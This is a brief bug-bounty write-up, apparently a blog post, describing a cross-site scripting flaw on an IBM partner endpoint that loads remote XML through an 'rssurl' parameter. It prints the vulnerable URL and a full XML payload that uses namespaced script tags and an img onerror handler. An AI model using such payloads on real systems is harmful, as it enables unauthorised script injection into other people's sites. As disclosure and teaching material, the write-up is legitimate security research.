hi :D
this my write up about my bug I've found on ibm.com, first I get URLs from web.archive.org on ibm.com by using waybackurls tool and I got this URL https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
this endpoint include XML file via rssurl
parameter and covert the content from XML to jsonp
but in headers, content-type: text/html
, this allowed to execute HTML tags in this page , so I've created an XML file with XSS payload and upload it on my website https://knassar702.github.io/xss.xml
and add the link of the file in rssurl
parameter
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
<info>
<name>
<value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
Done :D
Top comments (0)